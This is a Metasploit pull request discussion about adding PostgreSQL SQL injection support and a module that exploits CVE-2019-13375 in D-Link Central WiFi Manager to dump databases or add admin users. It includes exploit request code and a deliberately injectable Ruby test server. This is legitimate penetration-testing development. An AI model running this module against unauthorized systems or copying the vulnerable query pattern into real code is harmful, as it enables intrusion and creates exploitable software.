[GSoC] Module for CVE-2019-13375, and PostgreSQL support for the library
rapid7/metasploit-framework pull request #14067
Opened 2020-08-28 19:03 UTC by red0xff

This PR adds PostgreSQL injection support to the SQL injection library, and two modules for testing, one being an auxiliary module for [CVE-2019-13375](https://www.cvedetails.com/cve/CVE-2019-13375/), the other being a test module for testing every feature of the added library (didn't push it yet, not sure on how it would be pushed, as I wrote the vulnerable code also).

## Verification

Testing the module for CVE-2019-13375:

- [ ] Start `msfconsole`
- [ ] `use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb`
- [ ] See the instructions in `documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md`

Testing using the test module:

Not sure as of the best practices on this, the vulnerable code is the following:
```ruby
require 'pg'
require 'socket'
sck = TCPServer.open(1337)

conn = PG.connect( dbname: 'sqli', user: 'postgres', host: '127.0.0.1', port: 5432 )
loop{
  client = sck.accept
  id = client.gets.chomp
  begin
  conn.exec( "select content from articles where id=#{id}" ) do |result|
    result = result.to_a
    if result.empty?
      client.puts('[-] No results')
    else
      client.puts(result[0]['content'])
    end
  end
  rescue Exception => e
    puts e.message
  end
  client.close
}
```
I also have an SQL script that should be executed (that creates the database, table, and inserts values), and some simple configuration steps for PostgreSQL, the module connects over TCP to the vulnerable Ruby program, and uses the SQL injection vulnerability to test every feature of PostgreSQL injection support.

2020-09-03 17:21 UTC, jmartin-r7 reviewed
Check should always return a `Checkcode`.

2020-09-03 18:45 UTC, red0xff commented on modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
> +      fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
Ah yes, didn't notice that I was creating the object inside the check method, the block should always return a string (or fail), so returning a checkcode from there might cause errors to happen in the code that gets the result from the block.

I would suggest this workaround using upvalues, if you think exception handling would work better, just let me know.
```ruby
  def check
    is_check = true # upvalue, if true, the block will set check_error instead of failing
    check_error = nil # will get the CheckCode in case an error happens and is_check is true
    @sqli = create_sqli(dbms: PostgreSQLi::Common, opts: { encoder: :base64 }) do |payload|
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'Public', 'Conn.php'),
        'vars_post' => {
          'dbAction' => 'S',
          'dbSQL' => payload
        }
      )
      if res && res.code == 200
        res.body[%r{<column>(.+)</column>}m, 1] || ''
      else
        if is_check
          if res
            check_error = Exploit::CheckCode::Safe
          else
            check_error = Exploit::CheckCode::Unknown('Failed to send HTTP request') 
          end
          '' # because a String is expected, this will make test_vulnerable to return false, but we will just get check_error
        else
          fail_with Failure::Unreachable, 'Failed to send HTTP request' unless res
          fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
        end
      end
    end
    vulnerable_test = @sqli.test_vulnerable
    check_error || (vulnerable_test ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe)
  end
```
This was tested and works.

2020-09-03 21:18 UTC, jmartin-r7 commented on modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
> +      fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
Injecting code to be able to expose the extra conditions seems reasonable.

Looking closer relying on `@sqli` getting created for the module instance variable may be error prone.  I am not a fan of relying on `side-effects` of method calls.

I am concerned the scope and purpose of the block passed to `create_sqli` might be better limited by creating a local sqli object in `check` and another in `run` each written specifically for the context where they were created. Also `is_check` and `check_error` would alway reference their definitions in the `check` method in the proposed code and might create some odd be or undefined behavior unless you elevate them to instance variables as well.

There may be some way to refactor the block for reuse consider

```ruby
def vulnerable_request(payload)
  send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(target_uri, 'Public', 'Conn.php'),
    'vars_post' => {
      'dbAction' => 'S',
      'dbSQL' => payload
    }
end

def check
  check_error = nil
  check_sqli = create_sqli(dbms: PostgreSQLi::Common, opts: { encoder: :base64 }) do |payload|
    res = vulnerable_request(payload)
    if res && res.code == 200
      res.body[%r{<column>(.+)</column>}m, 1] || ''
    else
      if res
        check_error = Exploit::CheckCode::Safe
      else
        check_error = Exploit::CheckCode::Unknown('Failed to send HTTP request') 
      end
      '' # because a String is expected, this will make test_vulnerable to return false, but we will just get check_error
    end
  end
  vulnerable_test = check_sqli.test_vulnerable
  check_error || (vulnerable_test ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe)
end

def run
    ....
    @sqli = create_sqli(dbms: PostgreSQLi::Common, opts: { encoder: :base64 }) do |payload|
      res = vulnerable_request(payload)
      if res && res.code == 200
        res.body[%r{<column>(.+)</column>}m, 1] || ''
      else
        fail_with Failure::Unreachable, 'Failed to send HTTP request' unless res
        fail_with Failure::NotVulnerable, "Got #{res.code} response code" unless res.code == 200
      end
    end
    ....

```

I would like to see `@sqli` be a local variable in `run` passed to methods in the case statement for use.

These are all just suggestions, use what you think is best.

2020-09-06 01:02 UTC, cbrnrd commented on modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
> +##
```suggestion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'csv'
require 'digest'
```

2020-09-06 13:25 UTC, red0xff commented on documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md
> +## Actions
Not sure if I understand the feedback, I think there would be redundancy if I include verification steps for every `ACTION` here (remplacing `should work as in the scenarios below`), because the `Scenarios` section already has the expected results from every action.

2020-09-06 13:27 UTC, red0xff commented on modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
> +        ],
I think this one is correctly formatted, `],` at the same level as `'References'`, `rubocop` does not report a warning about it.

2020-10-24 15:03 UTC, h00die commented
@jmartin-r7  any update on landing this?

2020-10-26 14:11 UTC, jmartin-r7 commented
High on my list, will process soon.

2020-10-26 17:21 UTC, red0xff commented
I added the test module, the repository hosting minimalist vulnerable test applications [can be found here](https://github.com/red0xff/sqli_vulnerable/) (It's a permanent repo, will add test applications for other DBMS as I send pull-requests for supporting them).

2020-10-26 20:01 UTC, jmartin-r7 requested changes
Minor syntax requests. Please validate test module options for `Regular/reflected` case.

2020-10-26 23:59 UTC, red0xff commented on test/modules/auxiliary/test/postgres_sqli_test.rb
> +      res = sock.gets.chomp
The issue is in `HexEncodeStrings`, `Safe` fails in your test because `HexEncodeStrings` is still enabled.
Happens because `0x61`-style hex numbers are not valid in postgresql, fixed using decimals instead.
I also added encoding for the empty strings to avoid quotes.
There is still an issue that happens on hex_encode_strings, for strings that contain escaped quotes, 'hello\\'' for example, the hex_encode_strings method would consider the escaped quote as a delimiter, this doesn't happen often, but I'm thinking of a way to fix it

2020-10-27 00:00 UTC, red0xff commented on modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
> +      "'#{datastore['Admin_Username']}', '#{admin_hash}', 1)")
I added a check for the username, the module fails if it's nil, or contains `'` or `\`.

2020-11-10 15:39 UTC, jmartin-r7 commented on modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
> +        OptString.new('Admin_Password', [false, 'The password of the user to add/edit'])
Theses still need naming adjustments.

2020-11-10 15:47 UTC, jmartin-r7 commented on modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb
> +        ],
Just a consistency request, the lists for `Author` and `Actions` here are formatted differently. The reason rubocop did not warn is that the `[` is inline reducing the indentation level expectations.
```suggestion
        'References' => 
          [
            ['CVE', '2019-13373'],
            ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/']
          ],
```

2020-11-19 21:08 UTC, jmartin-r7 approved these changes

2021-02-14 18:14 UTC, merged

2021-02-14 18:15 UTC, jmartin-r7 commented
Added 7c4e42186d7b61ba510d3c28061829a5d4ae7df9 && 78a2fd1016893dc6931f96a0f803af3187411c96 to address merge conflict and autoload support changes.

2021-02-14 18:21 UTC, jmartin-r7 commented
## Release Notes
GSoC 2020 project supporting SQLi library usage with PostgreSQL. This support comes with a new module utilizing CVE-2019-13375 to dump database information or insert additional users into D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6.

2021-02-15 02:53 UTC, gwillcox-r7 commented
@jmartin-r7 Added the missing rn-enhancement label to cover the enhancements listed here but I think this also deserves a rn-module label as well. Just not sure if both tags will mess up the release notes automation, but it would be good to also note that we now have a module for CVE-2019-13375.

2021-03-04 17:45 UTC, pbarry-r7 commented
# Release Notes

New module `auxiliary/sqli/dlink/dlink_central_wifimanager_sqli` utilizes [CVE-2019-13375](https://attackerkb.com/topics/n3vokFNBje/cve-2019-13375?referrer=msfReleaseNotes) to dump database information or insert additional users into D-Link Central WiFi Manager CWM(100) versions prior to v1.03R0100_BETA6.  This module takes advantage of updated supporting SQLi library usage for PostgreSQL targets.